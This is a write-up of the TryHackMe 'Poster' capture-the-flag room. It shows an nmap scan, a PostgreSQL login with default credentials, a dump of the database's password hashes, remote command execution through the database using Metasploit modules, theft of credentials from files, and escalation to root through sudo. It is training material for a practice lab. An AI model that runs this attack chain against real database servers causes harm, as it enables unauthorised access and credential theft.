Tryhackme - Poster Room WriteUp

Poster is an easy category room developed by stuxnet . It depicts basically how a misconfiured RDBMS can lead to system hack. You can check out the room here.

Let's start with a quick nmap scan .

Initial Nmap scan

Copycopy code to clipboard
1PORT     STATE SERVICE    VERSION
222/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
3| ssh-hostkey:
4|   2048 71:ed:48:af:29:9e:30:c1:b6:1d:ff:b0:24:cc:6d:cb (RSA)
5|   256 eb:3a:a3:4e:6f:10:00:ab:ef:fc:c5:2b:0e:db:40:57 (ECDSA)
6|_  256 3e:41:42:35:38:05:d3:92:eb:49:39:c6:e3:ee:78:de (ED25519)
780/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
8|_http-server-header: Apache/2.4.18 (Ubuntu)
9|_http-title: Poster CMS
105432/tcp open  postgresql PostgreSQL DB 9.5.8 - 9.5.10
11| ssl-cert: Subject: commonName=ubuntu
12| Not valid before: 2020-07-29T00:54:25
13|_Not valid after:  2030-07-27T00:54:25
14|_ssl-date: TLS randomness does not represent time
15Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So we have SSH , a web server and postgres . Checking the web server , it is just a simple home page , nothing interesting. So , let's go with postgres. As the room directs us , we can use a lot of metasploit modules to enumerate and exploit postgres . First , we will check if there are any default passwords set up for the postgres server using the module auxiliary/scanner/postgres/postgres_login .

Copycopy code to clipboard
110.10.253.187:5432 - Login Successful: postgres:password@template1

We get a match !

Now, For executing arbitrary SQL commands on the server, we can use the module auxiliary/admin/postgres/postgres_sql. Using the command select version () , we can get the RDBMS version

We can also get the postgres user's hashes by using another metasploit module auxiliary/scanner/postgres/postgres_hashdump

Copycopy code to clipboard
1[+] Query appears to have run successfully
2[+] Postgres Server Hashes
3======================
4
5 Username   Hash
6 --------   ----
7 darkstart  md58842b99375db43e9fdf238753623a27d
8 poster     md578fb805c7412ae597b399844a54cce0a
9 postgres   md532e12f215ba27cb750c9e093ce4b5127
10 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
11 ti         md57af9ac4c593e9e4f275576e13f935579
12 tryhackme  md503aab1165001c8f8ccae31a8824efddc

Now to achieve RCE , we will use the module

exploit/multi/postgres/postgres_copy_from_program_cmd_exec

Running it, we will get a shell. Running id confirms that we are user postgres . Now , I tried to spawn a TTY but couldn't find python or php or anything useful . So I decided to enumerate the system. In the directory /home/dark , we see a juicy directory .

Copycopy code to clipboard
1ls -la /home/dark
2total 28
3drwxr-xr-x 2 dark dark 4096 Jul 28 20:33 .
4drwxr-xr-x 4 root root 4096 Jul 28 20:13 ..
5-rw------- 1 dark dark   26 Jul 28 20:33 .bash_history
6-rw-r--r-- 1 dark dark  220 Aug 31  2015 .bash_logout
7-rw-r--r-- 1 dark dark 3771 Aug 31  2015 .bashrc
8-rwxrwxrwx 1 dark dark   24 Jul 28 20:15 credentials.txt
9-rw-r--r-- 1 dark dark  655 May 16  2017 .profile

This gives us the credentials for the user dark. Since SSH is open , I logged on as dark in the system . Upon further enumeration , we find that there is a file users.txt in /home/alison . But it is only accessible by user alison. So tried some low hanging fruits like sudo -l , SUID binaries but couldn't find anything . So , I decided more ENUMERATION.

In /var/www/html , we see a config.php

Copycopy code to clipboard
1<?php
2
3    $dbhost = "127.0.0.1";
4    $dbuname = "alison";
5    $dbpass = <the password was stored here>;
6    $dbname = "mysudopassword";

So now , we have alison's password. Now , we can access users.txt and get our user flag.

Running sudo -l , we see the all time fav, ALL:ALL , so switch to root and we have our root flag !

Wrap it Up

Hope you learned something new . Thanks for reading and as always

See ya later!